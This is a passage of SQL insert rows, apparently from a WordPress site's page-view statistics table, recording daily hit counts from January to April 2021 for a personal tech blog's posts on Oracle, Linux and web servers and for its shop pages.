(963,'/index.php/my-account/','page','2021-01-26',1,322),
(964,'/','home','2021-01-27',17,0),
(965,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-01-27',1,104),
(966,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-27',4,110),
(967,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-27',1,312),
(968,'/','home','2021-01-28',21,0),
(969,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-28',2,312),
(970,'/index.php/cart/','page','2021-01-28',1,320),
(971,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-01-28',2,110),
(972,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-01-28',2,66),
(973,'/','home','2021-01-29',29,0),
(974,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-29',7,312),
(975,'/','home','2021-01-30',30,0),
(976,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-01-30',7,312),
(977,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-01-30',1,305),
(978,'/','home','2021-01-31',25,0),
(979,'/index.php/cart/','page','2021-01-31',2,320),
(980,'/index.php/checkout/','page','2021-01-31',1,321),
(981,'/index.php/about-me/','page','2021-01-31',1,51),
(982,'/index.php/my-account/','page','2021-01-31',1,322),
(983,'/','home','2021-02-01',26,0),
(984,'/','home','2021-02-02',29,0),
(985,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-02-02',1,104),
(986,'/','home','2021-02-03',33,0),
(987,'/','home','2021-02-04',23,0),
(988,'/','home','2021-02-05',29,0),
(989,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-05',3,312),
(990,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-02-05',1,104),
(991,'/','home','2021-02-06',24,0),
(992,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-06',6,110),
(993,'/index.php/about-me/','page','2021-02-06',1,51),
(994,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-06',1,329),
(995,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-06',1,312),
(996,'/','home','2021-02-07',27,0),
(997,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-07',8,312),
(998,'/index.php/about-me/','page','2021-02-07',2,51),
(999,'/index.php/cart/','page','2021-02-07',2,320),
(1000,'/index.php/checkout/','page','2021-02-07',1,321),
(1001,'/index.php/my-account/','page','2021-02-07',1,322),
(1002,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-07',1,329),
(1003,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-07',2,110),
(1004,'/','home','2021-02-08',26,0),
(1005,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-08',4,110),
(1006,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-08',2,329),
(1007,'/index.php/cart/','page','2021-02-08',2,320),
(1008,'/index.php/checkout/','page','2021-02-08',1,321),
(1009,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-08',1,312),
(1010,'/','home','2021-02-09',17,0),
(1011,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-09',1,312),
(1012,'/','home','2021-02-10',29,0),
(1013,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-10',1,110),
(1014,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-10',4,312),
(1015,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-10',1,56),
(1016,'/','home','2021-02-11',34,0),
(1017,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-11',1,312),
(1018,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899','post','2021-02-11',43,56),
(1019,'/index.php/about-me/','page','2021-02-11',2,51),
(1020,'/index.php/cart/','page','2021-02-11',2,320),
(1021,'/index.php/checkout/','page','2021-02-11',1,321),
(1022,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-11',1,329),
(1023,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-02-11',1,150),
(1024,'/index.php/my-account/','page','2021-02-11',1,322),
(1025,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-02-11',1,27),
(1026,'/','home','2021-02-12',26,0),
(1027,'/index.php/about-me/','page','2021-02-12',1,51),
(1028,'/index.php/2020/02/02/backup-restore-progress/','post','2021-02-12',3,64),
(1029,'/','home','2021-02-13',26,0),
(1030,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-13',8,312),
(1031,'/index.php/about-me/','page','2021-02-13',6,51),
(1032,'/index.php/cart/','page','2021-02-13',11,320),
(1033,'/index.php/checkout/','page','2021-02-13',4,321),
(1034,'/index.php/my-account/','page','2021-02-13',7,322),
(1035,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-13',4,329),
(1036,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2021-02-13',1,323),
(1037,'/index.php/2020/02/02/backup-restore-progress/','post','2021-02-13',1,64),
(1038,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-14',2,312),
(1039,'/','home','2021-02-14',23,0),
(1040,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-15',9,312),
(1041,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-15',26,56),
(1042,'/','home','2021-02-15',27,0),
(1043,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-16',19,312),
(1044,'/','home','2021-02-16',16,0),
(1045,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress','post','2021-02-16',6,150),
(1046,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-17',1,312),
(1047,'/','home','2021-02-17',16,0),
(1048,'/index.php/about-me/','page','2021-02-17',1,51),
(1049,'/index.php/cart/','page','2021-02-17',2,320),
(1050,'/index.php/checkout/','page','2021-02-17',1,321),
(1051,'/index.php/my-account/','page','2021-02-17',1,322),
(1052,'/','home','2021-02-18',26,0),
(1053,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-18',1,110),
(1054,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-02-18',1,150),
(1055,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-02-18',1,305),
(1056,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-18',2,312),
(1057,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-18',1,329),
(1058,'/index.php/2020/02/02/backup-restore-progress/','post','2021-02-18',1,64),
(1059,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-02-18',1,66),
(1060,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-02-18',1,68),
(1061,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-02-18',1,97),
(1062,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-02-18',1,104),
(1063,'/index.php/my-account/','page','2021-02-18',1,322),
(1064,'/index.php/checkout/','page','2021-02-18',1,321),
(1065,'/index.php/cart/','page','2021-02-18',2,320),
(1066,'/index.php/about-me/','page','2021-02-18',1,51),
(1067,'/','home','2021-02-19',20,0),
(1068,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-19',1,56),
(1069,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-19',2,110),
(1070,'/','home','2021-02-20',15,0),
(1071,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-20',6,312),
(1072,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-02-20',2,97),
(1073,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-20',1,56),
(1074,'/','home','2021-02-21',20,0),
(1075,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-21',5,312),
(1076,'/index.php/about-me/','page','2021-02-21',3,51),
(1077,'/index.php/cart/','page','2021-02-21',6,320),
(1078,'/index.php/checkout/','page','2021-02-21',3,321),
(1079,'/index.php/my-account/','page','2021-02-21',3,322),
(1080,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-02-21',1,305),
(1081,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-21',1,329),
(1082,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-02-21',1,150),
(1083,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-21',1,110),
(1084,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-02-21',2,97),
(1085,'/','home','2021-02-22',19,0),
(1086,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-02-22',1,305),
(1087,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-22',1,56),
(1088,'/','home','2021-02-23',20,0),
(1089,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-23',6,312),
(1090,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-23',2,110),
(1091,'/','home','2021-02-24',27,0),
(1092,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-24',3,312),
(1093,'/index.php/my-account/lost-password/','page','2021-02-24',1,322),
(1094,'/','home','2021-02-25',24,0),
(1095,'/','home','2021-02-26',22,0),
(1096,'/index.php/about-me/','page','2021-02-26',2,51),
(1097,'/index.php/cart/','page','2021-02-26',2,320),
(1098,'/index.php/checkout/','page','2021-02-26',1,321),
(1099,'/index.php/my-account/','page','2021-02-26',1,322),
(1100,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-26',2,312),
(1101,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-02-26',1,329),
(1102,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-02-26',1,305),
(1103,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-02-26',1,150),
(1104,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-02-26',1,110),
(1105,'/','home','2021-02-27',19,0),
(1106,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-02-27',1,56),
(1107,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-27',6,312),
(1108,'/','home','2021-02-28',24,0),
(1109,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-02-28',3,312),
(1110,'/index.php/cart/','page','2021-02-28',2,320),
(1111,'/index.php/about-me/','page','2021-02-28',1,51),
(1112,'/index.php/checkout/','page','2021-02-28',1,321),
(1113,'/index.php/my-account/','page','2021-02-28',1,322),
(1114,'/','home','2021-03-01',20,0),
(1115,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-01',2,312),
(1116,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-02',8,312),
(1117,'/','home','2021-03-02',28,0),
(1118,'/','home','2021-03-03',24,0),
(1119,'/index.php/about-me/','page','2021-03-03',1,51),
(1120,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-03-03',1,329),
(1121,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-03',6,312),
(1122,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-03-03',1,305),
(1123,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-03-03',1,150),
(1124,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-03',1,110),
(1125,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-03-03',1,56),
(1126,'/','home','2021-03-04',23,0),
(1127,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-04',8,312),
(1128,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-03-04',1,329),
(1129,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-04',1,110),
(1130,'/','home','2021-03-05',24,0),
(1131,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-05',2,312),
(1132,'/','home','2021-03-06',15,0),
(1133,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-06',3,312),
(1134,'/','home','2021-03-07',19,0),
(1135,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-07',2,312),
(1136,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-03-07',3,97),
(1137,'/','home','2021-03-08',23,0),
(1138,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-08',2,110),
(1139,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-08',3,312),
(1140,'/index.php/cart/','page','2021-03-08',1,320),
(1141,'/','home','2021-03-09',21,0),
(1142,'/index.php/about-me/','page','2021-03-09',1,51),
(1143,'/index.php/cart/','page','2021-03-09',2,320),
(1144,'/index.php/checkout/','page','2021-03-09',1,321),
(1145,'/index.php/my-account/','page','2021-03-09',1,322),
(1146,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-03-09',1,66),
(1147,'/','home','2021-03-10',17,0),
(1148,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-10',3,312),
(1149,'/','home','2021-03-11',21,0),
(1150,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-11',3,312),
(1151,'/','home','2021-03-12',22,0),
(1152,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-12',1,312),
(1153,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-13',5,312),
(1154,'/','home','2021-03-13',59,0),
(1155,'/','home','2021-03-14',27,0),
(1156,'/','home','2021-03-15',16,0),
(1157,'/index.php/about-me/','page','2021-03-15',2,51),
(1158,'/index.php/cart/','page','2021-03-15',4,320),
(1159,'/index.php/checkout/','page','2021-03-15',2,321),
(1160,'/index.php/my-account/','page','2021-03-15',2,322),
(1161,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-03-15',1,104),
(1162,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-15',2,312),
(1163,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-03-15',6,56),
(1164,'/','home','2021-03-16',65,0),
(1165,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-16',1,312),
(1166,'/index.php/2020/02/02/backup-restore-progress/','post','2021-03-16',1,64),
(1167,'/index.php/my-account/','page','2021-03-16',1,322),
(1168,'/index.php/about-me/','page','2021-03-16',1,51),
(1169,'/','home','2021-03-17',36,0),
(1170,'/index.php/about-me/','page','2021-03-17',2,51),
(1171,'/index.php/cart/','page','2021-03-17',2,320),
(1172,'/index.php/checkout/','page','2021-03-17',1,321),
(1173,'/index.php/my-account/','page','2021-03-17',1,322),
(1174,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-03-17',1,104),
(1175,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-03-17',1,97),
(1176,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-17',1,110),
(1177,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-03-17',1,150),
(1178,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-03-17',1,305),
(1179,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-17',6,312),
(1180,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-03-17',1,329),
(1181,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-03-17',1,68),
(1182,'/index.php/2020/02/02/backup-restore-progress/','post','2021-03-17',1,64),
(1183,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-03-17',1,66),
(1184,'/','home','2021-03-18',74,0),
(1185,'/index.php/about-me/','page','2021-03-18',4,51),
(1186,'/index.php/cart/','page','2021-03-18',8,320),
(1187,'/index.php/checkout/','page','2021-03-18',4,321),
(1188,'/index.php/my-account/','page','2021-03-18',4,322),
(1189,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-03-18',1,104),
(1190,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-03-18',1,97),
(1191,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-18',1,110),
(1192,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-03-18',4,150),
(1193,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-03-18',1,305),
(1194,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-18',2,312),
(1195,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-03-18',5,329),
(1196,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-03-18',1,68),
(1197,'/index.php/2020/02/02/backup-restore-progress/','post','2021-03-18',1,64),
(1198,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-03-18',1,66),
(1199,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-03-18',3,27),
(1200,'/','home','2021-03-19',20,0),
(1201,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-19',3,312),
(1202,'/','home','2021-03-20',33,0),
(1203,'/','home','2021-03-21',33,0),
(1204,'/','home','2021-03-22',23,0),
(1205,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-22',4,312),
(1206,'/index.php/my-account/lost-password/','page','2021-03-22',1,322),
(1207,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-03-22',2,97),
(1208,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-03-22',1,150),
(1209,'/','home','2021-03-23',28,0),
(1210,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-23',2,312),
(1211,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-24',1,312),
(1212,'/','home','2021-03-24',23,0),
(1213,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-03-24',1,56),
(1214,'/','home','2021-03-25',31,0),
(1215,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-25',4,312),
(1216,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-26',2,312),
(1217,'/','home','2021-03-26',19,0),
(1218,'/','home','2021-03-27',25,0),
(1219,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-27',2,312),
(1220,'/','home','2021-03-28',28,0),
(1221,'/index.php/about-me/','page','2021-03-28',1,51),
(1222,'/index.php/cart/','page','2021-03-28',2,320),
(1223,'/index.php/checkout/','page','2021-03-28',1,321),
(1224,'/index.php/my-account/','page','2021-03-28',1,322),
(1225,'/','home','2021-03-29',27,0),
(1226,'/index.php/about-me/','page','2021-03-29',1,51),
(1227,'/index.php/cart/','page','2021-03-29',2,320),
(1228,'/index.php/checkout/','page','2021-03-29',1,321),
(1229,'/index.php/my-account/','page','2021-03-29',1,322),
(1230,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-03-29',1,104),
(1231,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-03-29',1,97),
(1232,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-03-29',1,110),
(1233,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-03-29',1,150),
(1234,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-03-29',1,305),
(1235,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-29',6,312),
(1236,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-03-29',1,329),
(1237,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-03-29',1,68),
(1238,'/index.php/2020/02/02/backup-restore-progress/','post','2021-03-29',1,64),
(1239,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-03-29',1,66),
(1240,'/','home','2021-03-30',74,0),
(1241,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-03-30',1,312),
(1242,'/','home','2021-03-31',30,0),
(1243,'/index.php/cart/','page','2021-03-31',2,320),
(1244,'/index.php/about-me/','page','2021-03-31',1,51),
(1245,'/index.php/checkout/','page','2021-03-31',1,321),
(1246,'/','home','2021-04-01',32,0),
(1247,'/index.php/about-me/','page','2021-04-01',6,51),
(1248,'/index.php/cart/','page','2021-04-01',12,320),
(1249,'/index.php/checkout/','page','2021-04-01',5,321),
(1250,'/index.php/my-account/','page','2021-04-01',7,322),
(1251,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-01',3,329),
(1252,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2021-04-01',1,323),
(1253,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-02',4,312),
(1254,'/','home','2021-04-02',15,0),
(1255,'/','home','2021-04-03',36,0),
(1256,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-03',4,312),
(1257,'/index.php/about-me/','page','2021-04-03',1,51),
(1258,'/index.php/cart/','page','2021-04-03',2,320),
(1259,'/index.php/checkout/','page','2021-04-03',1,321),
(1260,'/index.php/my-account/','page','2021-04-03',1,322),
(1261,'/','home','2021-04-04',19,0),
(1262,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-04',3,312),
(1263,'/','home','2021-04-05',23,0),
(1264,'/index.php/about-me/','page','2021-04-05',1,51),
(1265,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-05',1,329),
(1266,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-05',2,312),
(1267,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-04-05',1,305),
(1268,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-04-05',1,150),
(1269,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-04-05',1,110),
(1270,'/','home','2021-04-06',19,0),
(1271,'/','home','2021-04-07',26,0),
(1272,'/','home','2021-04-08',31,0),
(1273,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-08',3,312),
(1274,'/index.php/about-me/','page','2021-04-08',1,51),
(1275,'/index.php/cart/','page','2021-04-08',2,320),
(1276,'/index.php/checkout/','page','2021-04-08',1,321),
(1277,'/index.php/my-account/','page','2021-04-08',1,322),
(1278,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-04-08',1,104),
(1279,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-04-08',1,97),
(1280,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-04-08',1,110),
(1281,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-04-08',1,150),
(1282,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-04-08',1,305),
(1283,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-08',1,329),
(1284,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-04-08',1,68),
(1285,'/index.php/2020/02/02/backup-restore-progress/','post','2021-04-08',1,64),
(1286,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-04-08',1,66),
(1287,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/?unapproved=118&moderation-hash=20363253ff98bd61a429907ada6296d3','post','2021-04-09',7,312),
(1288,'/','home','2021-04-09',32,0),
(1289,'/index.php/cart/','page','2021-04-09',4,320),
(1290,'/index.php/checkout/','page','2021-04-09',2,321),
(1291,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-09',1,329),
(1292,'/index.php/about-me/','page','2021-04-09',2,51),
(1293,'/index.php/my-account/','page','2021-04-09',1,322),
(1294,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-10',5,312),
(1295,'/index.php/cart/','page','2021-04-10',1,320),
(1296,'/index.php/about-me/','page','2021-04-10',1,51),
(1297,'/','home','2021-04-10',30,0),
(1298,'/','home','2021-04-11',22,0),
(1299,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-11',2,312),
(1300,'/','home','2021-04-12',25,0),
(1301,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-12',3,312),
(1302,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-04-12',1,66),
(1303,'/','home','2021-04-13',70,0),
(1304,'/','home','2021-04-14',56,0),
(1305,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-14',4,312),
(1306,'/','home','2021-04-15',52,0),
(1307,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-15',1,312),
(1308,'/','home','2021-04-16',29,0),
(1309,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-16',2,312),
(1310,'/','home','2021-04-17',18,0),
(1311,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-17',1,312),
(1312,'/','home','2021-04-18',38,0),
(1313,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-18',1,312),
(1314,'/','home','2021-04-19',25,0),
(1315,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-19',4,312),
(1316,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-04-19',2,110),
(1317,'/','home','2021-04-20',31,0),
(1318,'/index.php/about-me/','page','2021-04-20',1,51),
(1319,'/index.php/cart/','page','2021-04-20',2,320),
(1320,'/index.php/checkout/','page','2021-04-20',1,321),
(1321,'/index.php/my-account/','page','2021-04-20',1,322),
(1322,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-20',3,312),
(1323,'/','home','2021-04-21',27,0),
(1324,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-21',13,312),
(1325,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-21',10,329),
(1326,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-04-21',10,305),
(1327,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-04-21',9,150),
(1328,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-04-21',9,110),
(1329,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-04-21',9,104),
(1330,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-04-21',10,97),
(1331,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-04-21',9,68),
(1332,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-04-21',10,66),
(1333,'/index.php/2020/02/02/backup-restore-progress/','post','2021-04-21',10,64),
(1334,'/','home','2021-04-22',25,0),
(1335,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-22',1,312),
(1336,'/','home','2021-04-23',35,0),
(1337,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-23',3,312),
(1338,'/','home','2021-04-24',22,0),
(1339,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-24',4,312),
(1340,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-25',7,312),
(1341,'/','home','2021-04-25',29,0),
(1342,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-26',3,312),
(1343,'/','home','2021-04-26',66,0),
(1344,'/index.php/about-me/','page','2021-04-26',2,51),
(1345,'/index.php/cart/','page','2021-04-26',4,320),
(1346,'/index.php/checkout/','page','2021-04-26',2,321),
(1347,'/index.php/my-account/','page','2021-04-26',2,322),
(1348,'/index.php/about-me/','page','2021-04-27',4,51),
(1349,'/index.php/cart/','page','2021-04-27',8,320),
(1350,'/index.php/checkout/','page','2021-04-27',3,321),
(1351,'/index.php/my-account/','page','2021-04-27',5,322),
(1352,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-04-27',4,329),
